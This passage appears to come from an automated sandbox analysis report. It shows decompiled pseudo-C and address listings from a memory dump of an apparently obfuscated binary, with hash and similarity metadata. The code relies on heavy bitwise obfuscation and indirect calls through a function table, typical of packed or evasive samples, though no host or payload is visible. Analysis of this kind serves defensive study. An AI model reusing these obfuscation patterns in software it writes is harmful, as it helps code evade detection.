                  					_t898 = _t897 - 0xfffffffc;
                  					 *_t145 = _t625;
                  					_v40 = _v40 + (_t727 & 0x00000000) +  *_t897;
                  					_push(_v40);
                  					_pop(_t626);
                  					_t825 = _t823;
                  					_v36 = _t787;
                  					_t730 =  *(_t672 + 0x41c493);
                  					_t790 = _v36;
                  					if(_t730 > _t626) {
                  						_t152 = _t672 + 0x41cc19; // 0x41cc19
                  						 *_t898 =  *_t898 ^ _t730;
                  						 *_t898 =  *_t898 | _t152;
                  						_t153 = _t672 + 0x41c058; // 0x41c058
                  						 *_t898 =  *_t898 & 0x00000000;
                  						 *_t898 =  *_t898 + _t153;
                  						_t626 =  *((intOrPtr*)(_t672 + 0x41f064))(_t672, _t730);
                  					}
                  					 *_t898 = _t856;
                  					 *(_t672 + 0x41d0de) = 0 ^ _t626;
                  					_t859 = 0;
                  					_t899 = _t864;
                  					_pop(_t871);
                  					_t156 = _t672 + 0x41c23b; // 0x41c23b
                  					 *_t899 =  *_t899 ^ _t790;
                  					 *_t899 = _t156;
                  					_t157 = _t672 + 0x41c2e1; // 0x41c2e1
                  					_v8 = _v8 - _t859;
                  					_v8 = _v8 | _t157;
                  					_t629 =  *((intOrPtr*)(_t672 + 0x41f068))(_t859, _t790);
                  					 *(_t672 + 0x41d2a1) =  *(_t672 + 0x41d2a1) & 0x00000000;
                  					 *(_t672 + 0x41d2a1) =  *(_t672 + 0x41d2a1) ^ _t825 & 0x00000000 ^ _t629;
                  					_t828 = _t825;
                  					_t163 = _t672 + 0x41c6d4; // 0x41c6d4
                  					_v12 = _v12 ^ _t730;
                  					_v12 = _v12 + _t163;
                  					_t164 = _t672 + 0x41cc84; // 0x41cc84
                  					_v16 = _t164;
                  					_push( *((intOrPtr*)(_t672 + 0x41f060))(_v32, _t730));
                  					_pop( *_t167);
                  					_push(_v40);
                  					_pop( *_t169);
                  					_t900 =  &(_t899[1]);
                  					_v16 = _v16 - _t730;
                  					_v16 = _v16 + (0 ^ _v16);
                  					_t170 = _t672 + 0x41c719; // 0x41c719
                  					_v40 = _v40 & 0x00000000;
                  					_v20 = _v20 ^ _t170;
                  					_push( *((intOrPtr*)(_t672 + 0x41f060))(_v40, _t730));
                  					_pop( *_t175);
                  					_push(_v36);
                  					_pop( *_t177);
                  					_t637 =  *((intOrPtr*)(_t672 + 0x41f060))();
                  					_v32 = 0;
                  					_v24 = _v24 ^ _t637;
                  					_t181 = _t672 + 0x41d2e8; // 0x41d2e8
                  					_v28 = _v28 ^ _t828;
                  					_v28 = _v28 | _t181;
                  					_t639 =  *((intOrPtr*)(_t672 + 0x41f060))(_t828, _v32);
                  					_v32 = 0;
                  					_v32 = _v32 + _t639;
                  					_t185 = _t672 + 0x41ca71; // 0x41ca71
                  					_v36 = _t185;
                  					_t641 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v32);
                  					_pop( *_t188);
                  					_t731 = _v36;
                  					_v36 = _t859;
                  					_push(_t731 + _t641);
                  					_pop(_t642);
                  					_t733 = _t731 & 0x00000000 ^ _t871 & 0x00000000 ^  *(_t672 + 0x41c0c4);
                  					_t874 = _t871;
                  					if(_t733 > _t642) {
                  						_t193 = _t672 + 0x41d2e8; // 0x41d2e8
                  						_v32 = 0;
                  						 *_t900 =  *_t900 | _t193;
                  						_t196 = _t672 + 0x41ca71; // 0x41ca71
                  						 *_t900 =  *_t900 & 0x00000000;
                  						 *_t900 =  *_t900 ^ _t196;
                  						_t648 =  *((intOrPtr*)(_t672 + 0x41f064))(_t672, _v32);
                  						_push(_t874);
                  						 *(_t672 + 0x41c06b) =  *(_t672 + 0x41c06b) & 0x00000000;
                  						 *(_t672 + 0x41c06b) =  *(_t672 + 0x41c06b) | _t874 ^  *_t900 | _t648;
                  					}
                  					_pop( *_t202);
                  					_v40 = _t733;
                  					 *(_t672 + 0x41d067) =  *(_t672 + 0x41d067) & 0x00000000;
                  					 *(_t672 + 0x41d067) =  *(_t672 + 0x41d067) | _t733 & 0x00000000 ^ _v36;
                  					_t210 = _t672 + 0x41cefe; // 0x41cefe
                  					 *_t900 = _t210;
                  					_t645 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40);
                  					_v40 = _t828;
                  					 *(_t672 + 0x41d336) =  *(_t672 + 0x41d336) & 0x00000000;
                  					 *(_t672 + 0x41d336) =  *(_t672 + 0x41d336) | _t828 - _v40 ^ _t645;
                  					return _t645;
                  				}
                  			}

























































































































































                  0x03053a14
                  0x03053a14
                  0x03053a14
                  0x03053a15
                  0x03053a18
                  0x03053a1b
                  0x03053a1d
                  0x03053a20
                  0x03053a21
                  0x03053a24
                  0x03053a27
                  0x03053a2a
                  0x03053a2d
                  0x03053a30
                  0x03053a35
                  0x03053a35
                  0x03053a38
                  0x03053a40
                  0x03053a44
                  0x03053a45
                  0x03053a4c
                  0x03053a4e
                  0x03053a55
                  0x03053a5c
                  0x03053a5c
                  0x03053a67
                  0x03054153
                  0x0305446d
                  0x03054473
                  0x0305447c
                  0x0305447f
                  0x03054486
                  0x0305448a
                  0x03054493
                  0x03054494
                  0x03054497
                  0x0305449a
                  0x030544a0
                  0x030544a7
                  0x030544ad
                  0x030544b4
                  0x030544b7
                  0x030544bd
                  0x030544c5
                  0x030544cc
                  0x030544d2
                  0x030544d5
                  0x030544dc
                  0x030544e2
                  0x030544e9
                  0x030544ec
                  0x030544f2
                  0x030544fa
                  0x03054501
                  0x03054507
                  0x0305450a
                  0x03054511
                  0x03054517
                  0x0305451e
                  0x03054521
                  0x03054528
                  0x0305452b
                  0x0305452e
                  0x03054534
                  0x0305453c
                  0x03054543
                  0x03054549
                  0x03054549
                  0x03054159
                  0x03054159
                  0x0305415f
                  0x03054169
                  0x0305416c
                  0x03054172
                  0x0305417c
                  0x0305417f
                  0x0305418b
                  0x03054192
                  0x03054198
                  0x03054199
                  0x0305419f
                  0x030541a6
                  0x030541a9
                  0x030541af
                  0x030541b6
                  0x030541b9
                  0x030541c2
                  0x030541c5
                  0x030541ce
                  0x030541d1
                  0x030541dd
                  0x030541e0
                  0x030541e5
                  0x030541e9
                  0x030541ec
                  0x030541ee
                  0x030541fc
                  0x030541fe
                  0x03054201
                  0x03054203
                  0x0305420a
                  0x0305420e
                  0x03054211
                  0x03054217
                  0x0305421e
                  0x03054221
                  0x0305422d
                  0x03054234
                  0x0305423a
                  0x0305423a
                  0x03054240
                  0x03054244
                  0x03054248
                  0x0305424b
                  0x03054252
                  0x03054255
                  0x03054258
                  0x03054261
                  0x03054264
                  0x0305426a
                  0x03054272
                  0x03054279
                  0x0305427f
                  0x03054282
                  0x03054289
                  0x0305428c
                  0x0305428f
                  0x03054296
                  0x03054299
                  0x0305429c
                  0x030542a3
                  0x030542a7
                  0x030542aa
                  0x030542b1
                  0x030542b4
                  0x030542b7
                  0x030542c6
                  0x030542c9
                  0x030542d0
                  0x030542d6
                  0x030542d9
                  0x030542e0
                  0x030542e6
                  0x030542f0
                  0x030542f3
                  0x030542fa
                  0x030542fd
                  0x03054300
                  0x03054306
                  0x0305430d
                  0x03054310
                  0x0305431c
                  0x0305431f
                  0x03054322
                  0x03054329
                  0x0305432a
                  0x0305432d
                  0x0305432e
                  0x0305433d
                  0x0305433f
                  0x03054344
                  0x03054346
                  0x0305434c
                  0x03054353
                  0x03054356
                  0x0305435c
                  0x03054366
                  0x03054369
                  0x03054369
                  0x03054371
                  0x03054378
                  0x0305437e
                  0x0305437f
                  0x03054386
                  0x0305438d
                  0x03054390
                  0x03054393
                  0x03054399
                  0x030543a0
                  0x030543a6
                  0x030543a9
                  0x030543b0
                  0x030543b7
                  0x030543ba
                  0x030543bd
                  0x030543c5
                  0x030543cc
                  0x030543d2
                  0x030543d2
                  0x03054551
                  0x03054555
                  0x03054558
                  0x0305455b
                  0x03054562
                  0x03054565
                  0x03054568
                  0x03054571
                  0x03054574
                  0x0305457a
                  0x03054584
                  0x03054587
                  0x03054593
                  0x03054596
                  0x03054599
                  0x030545a0
                  0x030545a1
                  0x030545a4
                  0x030545b2
                  0x030545b4
                  0x030545b7
                  0x030545b9
                  0x030545bf
                  0x030545c9
                  0x030545cc
                  0x030545d2
                  0x030545dc
                  0x030545df
                  0x030545e5
                  0x030545ec
                  0x030545f2
                  0x030545f2
                  0x030545fe
                  0x03054603
                  0x0305460d
                  0x03054611
                  0x03054614
                  0x0305461a
                  0x03054621
                  0x03054624
                  0x0305462b
                  0x0305462e
                  0x03054631
                  0x0305463d
                  0x03054644
                  0x0305464a
                  0x03054654
                  0x03054657
                  0x0305465b
                  0x0305465f
                  0x03054662
                  0x03054668
                  0x03054672
                  0x03054675
                  0x03054681
                  0x03054688
                  0x0305468e
                  0x03054695
                  0x03054698
                  0x030546a1
                  0x030546a5
                  0x030546af
                  0x030546b2
                  0x030546b9
                  0x030546bc
                  0x030546bf
                  0x030546c5
                  0x030546cf
                  0x030546d2
                  0x030546d8
                  0x030546e0
                  0x030546e7
                  0x030546f2
                  0x030546f5
                  0x030546f8
                  0x03054700
                  0x03054704
                  0x0305470a
                  0x03054710
                  0x0305471a
                  0x0305471d
                  0x03054729
                  0x03054730
                  0x03054736
                  0x03054741
                  0x03054743
                  0x03054744
                  0x0305474a
                  0x03054754
                  0x03054757
                  0x0305475d
                  0x03054767
                  0x0305476a
                  0x03054773
                  0x03054776
                  0x03054781
                  0x03054788
                  0x0305478b
                  0x0305478e
                  0x03054791
                  0x03054792
                  0x03054793
                  0x030547a0
                  0x030547a5
                  0x030547a7
                  0x030547ad
                  0x030547b4
                  0x030547b7
                  0x030547bd
                  0x030547c4
                  0x030547c7
                  0x030547c7
                  0x030547cd
                  0x030547d4
                  0x030547da
                  0x030547dd
                  0x030547ed
                  0x030547f4
                  0x030547f7
                  0x030547fa
                  0x03054800
                  0x03054807
                  0x0305480a
                  0x03054812
                  0x03054819
                  0x0305481f
                  0x03054820
                  0x03054821
                  0x03054828
                  0x0305482b
                  0x0305482e
                  0x0305482f
                  0x03054832
                  0x03054835
                  0x03054836
                  0x03054839
                  0x0305483b
                  0x03054846
                  0x03054848
                  0x03054849
                  0x03054849
                  0x0305484d
                  0x03054850
                  0x03054853
                  0x03054856
                  0x03054857
                  0x0305485b
                  0x0305485c
                  0x0305485e
                  0x03054860
                  0x03054861
                  0x03054861
                  0x03054861
                  0x03054868
                  0x0305486b
                  0x0305486e
                  0x03054875
                  0x03054879
                  0x0305487c
                  0x03054883
                  0x03054887
                  0x0305488a
                  0x03054890
                  0x03054898
                  0x0305489f
                  0x030548a8
                  0x030548c1
                  0x03053a6d
                  0x03053a73
                  0x03053a76
                  0x03053a79
                  0x03053a7f
                  0x03053a89
                  0x03053a8c
                  0x03053a98
                  0x03053a9f
                  0x03053aa5
                  0x03053aa6
                  0x03053aad
                  0x03053ab0
                  0x03053ab3
                  0x03053aba
                  0x03053abd
                  0x03053ac0
                  0x03053ac7
                  0x03053aca
                  0x03053acd
                  0x03053ad4
                  0x03053ad8
                  0x03053adb
                  0x03053ae3
                  0x03053ae6
                  0x03053ae9
                  0x03053af0
                  0x03053af1
                  0x03053af4
                  0x03053af5
                  0x03053b04
                  0x03053b06
                  0x03053b0b
                  0x03053b0d
                  0x03053b14
                  0x03053b18
                  0x03053b1b
                  0x03053b24
                  0x03053b27
                  0x03053b2d
                  0x03053b2f
                  0x03053b36
                  0x03053b3c
                  0x03053b46
                  0x03053b4a
                  0x03053b4d
                  0x03053b50
                  0x03053b57
                  0x03053b5a
                  0x03053b5d
                  0x03053b63
                  0x03053b6d
                  0x03053b70
                  0x03053b79
                  0x03053b7c
                  0x03053b87
                  0x03053b8e
                  0x03053b91
                  0x03053b94
                  0x03053b97
                  0x03053b98
                  0x03053b99
                  0x03053ba4
                  0x03053ba6
                  0x03053bab
                  0x03053bad
                  0x03053bb3
                  0x03053bba
                  0x03053bbd
                  0x03053bc6
                  0x03053bc9
                  0x03053bc9
                  0x03053bcf
                  0x03053bd6
                  0x03053bdf
                  0x03053be5
                  0x03053bef
                  0x03053bf2
                  0x03053bf8
                  0x03053bff
                  0x03053c02
                  0x03053c08
                  0x03053c12
                  0x03053c15
                  0x03053c1c
                  0x03053c20
                  0x03053c23
                  0x03053c2f
                  0x03053c35
                  0x03053c39
                  0x03053c3c
                  0x03053c3f
                  0x03053c42
                  0x03053c43
                  0x03053c44
                  0x03053c4a
                  0x03053c4d
                  0x03053c50
                  0x03053c53
                  0x03053c55
                  0x03053c5c
                  0x03053c60
                  0x03053c63
                  0x03053c69
                  0x03053c70
                  0x03053c79
                  0x03053c7a
                  0x03053c7d
                  0x03053c80
                  0x03053c80
                  0x03053c8b
                  0x03053c91
                  0x03053c94
                  0x03053c9b
                  0x03053c9f
                  0x03053ca2
                  0x03053ca8
                  0x03053caf
                  0x03053cb2
                  0x03053cbe
                  0x03053cc5
                  0x03053ccb
                  0x03053ccc
                  0x03053cd3
                  0x03053cd7
                  0x03053cda
                  0x03053ce0
                  0x03053cea
                  0x03053ced
                  0x03053cf4
                  0x03053cf7
                  0x03053cfa
                  0x03053d00
                  0x03053d0a
                  0x03053d0d
                  0x03053d15
                  0x03053d18
                  0x03053d1f
                  0x03053d22
                  0x03053d25
                  0x03053d28
                  0x03053d29
                  0x03053d2a
                  0x03053d39
                  0x03053d3b
                  0x03053d40
                  0x03053d42
                  0x03053d48
                  0x03053d4f
                  0x03053d52
                  0x03053d59
                  0x03053d5c
                  0x03053d65
                  0x03053d66
                  0x03053d69
                  0x03053d6c
                  0x03053d6c
                  0x03053d7b
                  0x03053d84
                  0x03053d8b
                  0x03053d91
                  0x03053d92
                  0x03053d9b
                  0x03053d9e
                  0x03053da4
                  0x03053dab
                  0x03053dae
                  0x03053db4
                  0x03053dbe
                  0x03053dc1
                  0x03053dd0
                  0x03053dd7
                  0x03053dda
                  0x03053ddd
                  0x03053de0
                  0x03053de1
                  0x03053de2
                  0x03053ded
                  0x03053def
                  0x03053df4
                  0x03053df6
                  0x03053dfd
                  0x03053e00
                  0x03053e03
                  0x03053e0a
                  0x03053e0e
                  0x03053e11
                  0x03053e11
                  0x03053e19
                  0x03053e20
                  0x03053e26
                  0x03053e27
                  0x03053e27
                  0x03053e28
                  0x03053e2f
                  0x03053e32
                  0x03053e35
                  0x03053e3c
                  0x03053e3f
                  0x03053e42
                  0x03053e4e
                  0x03053e55
                  0x03053e5b
                  0x03053e5c
                  0x03053e63
                  0x03053e66
                  0x03053e69
                  0x03053e72
                  0x03053e7b
                  0x03053e7c
                  0x03053e7f
                  0x03053e82
                  0x03053e8d
                  0x03053e91
                  0x03053e94
                  0x03053e97
                  0x03053e9d
                  0x03053ea4
                  0x03053ead
                  0x03053eae
                  0x03053eb1
                  0x03053eb4
                  0x03053eba
                  0x03053ec0
                  0x03053eca
                  0x03053ecd
                  0x03053ed4
                  0x03053ed7
                  0x03053eda
                  0x03053ee0
                  0x03053eea
                  0x03053eed
                  0x03053ef6
                  0x03053ef9
                  0x03053eff
                  0x03053f02
                  0x03053f05
                  0x03053f0c
                  0x03053f10
                  0x03053f1e
                  0x03053f20
                  0x03053f23
                  0x03053f25
                  0x03053f2b
                  0x03053f35
                  0x03053f38
                  0x03053f3f
                  0x03053f43
                  0x03053f46
                  0x03053f4c
                  0x03053f52
                  0x03053f59
                  0x03053f5f
                  0x03053f60
                  0x03053f66
                  0x03053f6e
                  0x03053f75
                  0x03053f7e
                  0x03053f87
                  0x03053f8a
                  0x03053f90
                  0x03053f98
                  0x03053f9f
                  0x03053fa8
                  0x03053fa8

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 72f08a90819b8a7d6b902a99b873cf3cacbcc3fbfee91f535511ca024593f170
                  • Instruction ID: 8979854066d7b83e7cc61917e18fb0622c4394068b12d7aa43156198b74b7ae8
                  • Opcode Fuzzy Hash: 72f08a90819b8a7d6b902a99b873cf3cacbcc3fbfee91f535511ca024593f170
                  • Instruction Fuzzy Hash: F1921172844608DFEF04DFA0C889BEEBBF5FF48310F1944AAD889AA145D7385564CF69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E03055262(signed int __ebx, signed int __ecx, void* __edi, signed int __esi) {
                  				signed int _t430;
                  				signed int _t432;
                  				intOrPtr _t438;
                  				signed int _t441;
                  				intOrPtr _t443;
                  				signed int _t445;
                  				void* _t447;
                  				signed int _t448;
                  				signed int _t451;
                  				signed int _t456;
                  				signed int _t462;
                  				void* _t463;
                  				signed int _t467;
                  				void* _t469;
                  				intOrPtr _t470;
                  				intOrPtr _t473;
                  				signed int _t475;
                  				void* _t476;
                  				signed int _t478;
                  				signed int _t483;
                  				signed int _t485;
                  				signed int _t488;
                  				signed int _t491;
                  				signed int _t495;
                  				void* _t497;
                  				void* _t498;
                  				signed int _t501;
                  				signed int _t506;
                  				signed int _t511;
                  				void* _t512;
                  				signed int _t514;
                  				void* _t516;
                  				signed int _t517;
                  				intOrPtr _t522;
                  				signed int _t523;
                  				signed int _t525;
                  				void* _t527;
                  				signed int _t528;
                  				signed int _t532;
                  				void* _t534;
                  				signed int _t535;
                  				signed int _t538;
                  				signed int _t541;
                  				intOrPtr _t544;
                  				signed int _t552;
                  				signed int _t554;
                  				void* _t555;
                  				signed int _t564;
                  				signed int _t567;
                  				signed int _t570;
                  				signed int _t572;
                  				signed int _t575;
                  				void* _t577;
                  				void* _t579;
                  				signed int _t586;
                  				signed int _t588;
                  				void* _t589;
                  				signed int _t594;
                  				signed int _t596;
                  				void* _t599;
                  				signed int _t601;
                  				signed int _t603;
                  				signed int _t609;
                  				void* _t612;
                  				signed int _t615;
                  				signed int _t618;
                  				signed int _t620;
                  				signed int _t623;
                  				signed int _t625;
                  				signed int _t627;
                  				signed int _t629;
                  				signed int _t632;
                  				signed int _t636;
                  				signed int _t639;
                  				signed int _t642;
                  				signed int _t645;
                  				signed int _t648;
                  				signed int _t651;
                  				signed int _t654;
                  				signed int _t657;
                  				void* _t660;
                  				signed int _t664;
                  				signed int _t666;
                  				signed int _t669;
                  				signed int _t672;
                  				signed int _t676;
                  				intOrPtr* _t680;
                  				signed int _t682;
                  				signed int _t685;
                  				signed int _t688;
                  				void* _t691;
                  				signed int _t693;
                  				void* _t694;
                  				signed int _t696;
                  				signed int _t701;
                  				signed int _t702;
                  				signed int _t705;
                  				void* _t706;
                  				signed int _t708;
                  				signed int _t709;
                  				signed int _t712;
                  				signed int _t715;
                  				signed int _t718;
                  				signed int _t729;
                  				signed int _t732;
                  				signed int _t733;
                  				signed int _t741;
                  				signed int _t744;
                  				void* _t745;
                  				signed int _t747;
                  				signed int* _t757;
                  				signed int* _t758;
                  				signed int* _t759;
                  				signed int* _t760;
                  				signed int* _t761;
                  				signed int* _t762;
                  				signed int* _t763;
                  				signed int* _t764;
                  
                  				_t701 = __esi;
                  				_t564 = __ebx;
                  				 *(_t741 - 0x14) = 0;
                  				_push( *(_t741 - 0x14));
                  				 *_t757 =  *_t757 ^ __ebx + 0x0041c349;
                  				_push(_t632);
                  				 *_t757 =  *_t757 ^ _t632;
                  				 *_t757 =  *_t757 | __ebx + 0x0041c1b7;
                  				_t430 =  *((intOrPtr*)(__ebx + 0x41f068))();
                  				 *(_t741 - 0x14) = __ecx;
                  				 *(__ebx + 0x41cf63) =  *(__ebx + 0x41cf63) & 0x00000000;
                  				 *(__ebx + 0x41cf63) =  *(__ebx + 0x41cf63) ^ __ecx -  *(_t741 - 0x14) ^ _t430;
                  				_t676 =  *(__edi + 0x80);
                  				_t14 = _t564 + 0x41ce92; // 0x41ce92
                  				_push(_t741);
                  				 *_t757 =  *_t757 & 0x00000000;
                  				 *_t757 =  *_t757 + _t14;
                  				_t432 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				 *(_t741 - 0x10) = _t676;
                  				 *(__ebx + 0x41d0ab) =  *(__ebx + 0x41d0ab) & 0x00000000;
                  				 *(__ebx + 0x41d0ab) =  *(__ebx + 0x41d0ab) ^ _t676 & 0x00000000 ^ _t432;
                  				 *(_t741 - 0x10) = _t432;
                  				_push( *((intOrPtr*)(_t741 + 8)) +  *(_t741 - 0x10));
                  				_pop(_t680);
                  				_t25 = _t564 + 0x41cade; // 0x41cade
                  				_push(_t741);
                  				 *_t757 =  *_t757 & 0x00000000;
                  				 *_t757 =  *_t757 ^ _t25;
                  				_t26 = _t564 + 0x41c3a5; // 0x41c3a5
                  				_push(__ebx);
                  				 *_t757 =  *_t757 & 0x00000000;
                  				 *_t757 =  *_t757 | _t26;
                  				_t438 =  *((intOrPtr*)(__ebx + 0x41f068))();
                  				 *_t757 = _t741;
                  				 *((intOrPtr*)(__ebx + 0x41c073)) = _t438;
                  				_t744 = 0;
                  				do {
                  					if( *_t680 != 0) {
                  						 *_t46 =  *_t680;
                  						_t702 =  *(_t744 - 0x14);
                  						_t48 = _t564 + 0x41d32a; // 0x41d32a
                  						 *_t757 =  *_t757 & 0x00000000;
                  						 *_t757 =  *_t757 ^ _t48;
                  						_t49 = _t564 + 0x41cdb4; // 0x41cdb4
                  						 *_t757 =  *_t757 ^ _t744;
                  						 *_t757 = _t49;
                  						_t441 =  *((intOrPtr*)(_t564 + 0x41f068))(_t744, _t744);
                  						 *(_t564 + 0x41cada) =  *(_t564 + 0x41cada) & 0x00000000;
                  						 *(_t564 + 0x41cada) =  *(_t564 + 0x41cada) | _t632 & 0x00000000 ^ _t441;
                  						_t632 = _t632;
                  					} else {
                  						_t29 = _t570 + 0x41d076; // 0x41d076
                  						 *(_t744 - 0x10) = 0;
                  						 *_t761 =  *_t761 | _t29;
                  						_t552 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10));
                  						 *(_t744 - 0x14) = _t701;
                  						 *(_t570 + 0x41d0ee) = 0 ^ _t552;
                  						_push( *(_t680 + 0x10));
                  						_pop( *_t37);
                  						_push( *(_t744 - 0x10));
                  						_pop(_t702);
                  						_t39 = _t570 + 0x41c2b0; // 0x41c2b0
                  						 *_t761 = _t39;
                  						_t554 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10));
                  						 *(_t570 + 0x41c1b3) =  *(_t570 + 0x41c1b3) & 0x00000000;
                  						 *(_t570 + 0x41c1b3) =  *(_t570 + 0x41c1b3) | _t744 ^  *_t761 | _t554;
                  						_t744 = _t744;
                  					}
                  					_t636 =  *_t757;
                  					 *_t757 =  *(_t680 + 0x10);
                  					_t57 = _t564 + 0x41c661; // 0x41c661
                  					 *_t757 =  *_t757 ^ _t744;
                  					 *_t757 =  *_t757 + _t57;
                  					_t443 =  *((intOrPtr*)(_t564 + 0x41f060))(_t632);
                  					 *_t757 = _t702;
                  					 *((intOrPtr*)(_t564 + 0x41d31e)) = _t443;
                  					_t705 = 0;
                  					 *_t60 = _t744;
                  					_t61 = _t564 + 0x41c5b3; // 0x41c5b3
                  					 *_t757 = _t61;
                  					_t445 =  *((intOrPtr*)(_t564 + 0x41f060))( *(_t744 - 0x10));
                  					 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
                  					 *_t757 =  *_t757 ^ _t445;
                  					_t67 = _t564 + 0x41c868; // 0x41c868
                  					 *_t757 =  *_t757 & 0x00000000;
                  					 *_t757 =  *_t757 ^ _t67;
                  					_t447 =  *((intOrPtr*)(_t564 + 0x41f060))( *(_t744 - 0x14));
                  					 *_t69 = _t680;
                  					_t586 = 0 ^  *(_t744 - 0x10);
                  					 *_t71 = _t447;
                  					 *(_t744 - 0x14) =  *(_t744 - 0x14) + _t586;
                  					_push( *(_t744 - 0x14));
                  					_pop(_t448);
                  					_t682 = _t680;
                  					 *(_t744 - 0x14) = _t448;
                  					_t588 = _t586 & 0x00000000 ^ _t448 & 0x00000000 ^  *(_t564 + 0x41c633);
                  					_t451 =  *(_t744 - 0x14);
                  					if(_t588 > _t451) {
                  						_t78 = _t564 + 0x41c5b3; // 0x41c5b3
                  						 *_t757 = _t78;
                  						_t80 = _t564 + 0x41c868; // 0x41c868
                  						 *(_t744 - 0x10) =  *(_t744 - 0x10) & 0x00000000;
                  						 *_t757 =  *_t757 | _t80;
                  						_t451 =  *((intOrPtr*)(_t564 + 0x41f064))( *(_t744 - 0x10),  *(_t744 - 0x14));
                  					}
                  					 *(_t744 - 0x10) = _t636;
                  					 *(_t564 + 0x41c2a0) =  *(_t564 + 0x41c2a0) & 0x00000000;
                  					 *(_t564 + 0x41c2a0) =  *(_t564 + 0x41c2a0) | _t636 & 0x00000000 ^ _t451;
                  					_t639 =  *(_t744 - 0x10);
                  					 *(_t744 - 0x10) = _t564;
                  					_t567 =  *(_t744 - 0x10);
                  					 *_t757 =  *_t757 & 0x00000000;
                  					 *_t757 =  *_t757 | _t451 & 0x00000000 | _t564 & 0x00000000 ^  *(_t744 + 8);
                  					_t94 = _t567 + 0x41c812; // 0x41c812
                  					 *_t757 =  *_t757 & 0x00000000;
                  					 *_t757 =  *_t757 + _t94;
                  					_t95 = _t567 + 0x41ca65; // 0x41ca65
                  					 *_t757 =  *_t757 & 0x00000000;
                  					 *_t757 =  *_t757 | _t95;
                  					_t456 =  *((intOrPtr*)(_t567 + 0x41f068))(_t588, _t705);
                  					 *(_t744 - 0x14) = _t682;
                  					 *(_t567 + 0x41d25f) =  *(_t567 + 0x41d25f) & 0x00000000;
                  					 *(_t567 + 0x41d25f) =  *(_t567 + 0x41d25f) ^ (_t682 -  *(_t744 - 0x14) | _t456);
                  					_t685 =  *(_t744 - 0x14);
                  					 *_t104 = _t588;
                  					 *_t757 =  *_t757 ^ _t705;
                  					_push( *((intOrPtr*)(_t744 - 8)));
                  					_pop(_t706);
                  					 *((intOrPtr*)(_t744 - 8)) = _t706 +  *(_t744 - 0x10);
                  					_t708 = 0;
                  					_t108 = _t567 + 0x41d15d; // 0x41d15d
                  					 *_t757 =  *_t757 - _t588;
                  					 *_t757 = _t108;
                  					_t109 = _t567 + 0x41c260; // 0x41c260
                  					 *(_t744 - 0x10) = 0;
                  					 *_t757 =  *_t757 | _t109;
                  					_push( *((intOrPtr*)(_t567 + 0x41f068))( *(_t744 - 0x10), _t588));
                  					_pop( *_t113);
                  					_push( *(_t744 - 0x10));
                  					_pop( *_t115);
                  					_push( *((intOrPtr*)(_t685 + 0xc)));
                  					_pop( *_t117);
                  					_push( *(_t744 - 0x14));
                  					_pop(_t589);
                  					 *_t757 =  *_t757 & 0x00000000;
                  					 *_t757 =  *_t757 + _t589;
                  					_t119 = _t567 + 0x41ca52; // 0x41ca52
                  					 *_t757 =  *_t757 - _t567;
                  					 *_t757 =  *_t757 + _t119;
                  					_t462 =  *((intOrPtr*)(_t567 + 0x41f060))(_t567, _t567);
                  					 *(_t744 - 0x14) = _t639;
                  					 *(_t567 + 0x41cd09) =  *(_t567 + 0x41cd09) & 0x00000000;
                  					 *(_t567 + 0x41cd09) =  *(_t567 + 0x41cd09) | _t639 -  *(_t744 - 0x14) ^ _t462;
                  					_t642 =  *(_t744 - 0x14);
                  					_t758 = _t757 - 0xfffffffc;
                  					_push(0);
                  					 *_t758 =  *_t758 | _t462;
                  					_push( *_t757);
                  					_pop(_t463);
                  					 *_t758 = _t463 +  *(_t744 + 8);
                  					_t130 = _t567 + 0x41c07f; // 0x41c07f
                  					 *_t758 = _t130;
                  					_t467 =  *((intOrPtr*)(_t567 + 0x41f060))( *(_t744 - 0x10),  *(_t744 - 0x14));
                  					 *_t758 =  *_t758 - _t642;
                  					 *_t758 =  *_t758 | _t467;
                  					_t133 = _t567 + 0x41d248; // 0x41d248
                  					 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
                  					 *_t758 =  *_t758 | _t133;
                  					_t469 =  *((intOrPtr*)(_t567 + 0x41f060))( *(_t744 - 0x14), _t642);
                  					_t594 =  *_t758;
                  					_t759 =  &(_t758[1]);
                  					 *(_t744 - 0x10) = _t567;
                  					_push(_t594 + _t469);
                  					_t570 =  *(_t744 - 0x10);
                  					_pop(_t470);
                  					_t596 = _t594 & 0x00000000 ^ _t642 -  *_t759 ^  *(_t570 + 0x41d0e6);
                  					_t645 = _t642;
                  					if(_t596 > _t470) {
                  						_t141 = _t570 + 0x41c07f; // 0x41c07f
                  						 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
                  						 *_t759 =  *_t759 + _t141;
                  						_t145 = _t570 + 0x41d248; // 0x41d248
                  						 *(_t744 - 0x14) = 0;
                  						 *_t759 =  *_t759 | _t145;
                  						_t470 =  *((intOrPtr*)(_t570 + 0x41f064))( *(_t744 - 0x14),  *(_t744 - 0x14));
                  						 *(_t744 - 0x10) = _t708;
                  						 *((intOrPtr*)(_t570 + 0x41cd68)) = _t470;
                  						_t708 =  *(_t744 - 0x10);
                  					}
                  					_pop( *_t152);
                  					 *_t759 = _t596 & 0x00000000 ^  *(_t744 - 0x10);
                  					_t599 = _t708;
                  					_t709 = _t599 +  *(_t744 + 8);
                  					_t601 = 0;
                  					 *_t759 =  *_t759 & 0x00000000;
                  					 *_t759 =  *_t759 | _t601;
                  					_t155 = _t570 + 0x41d135; // 0x41d135
                  					 *_t759 = _t155;
                  					_t157 = _t570 + 0x41c60e; // 0x41c60e
                  					 *_t759 =  *_t759 & 0x00000000;
                  					 *_t759 =  *_t759 | _t157;
                  					_t473 =  *((intOrPtr*)(_t570 + 0x41f068))(_t601,  *(_t744 - 0x10), _t470);
                  					 *(_t744 - 0x14) = _t645;
                  					 *((intOrPtr*)(_t570 + 0x41c3e6)) = _t473;
                  					_t648 =  *(_t744 - 0x14);
                  					_t603 =  *_t759;
                  					_t760 = _t759 - 0xfffffffc;
                  					 *_t760 =  *_t760 - _t648;
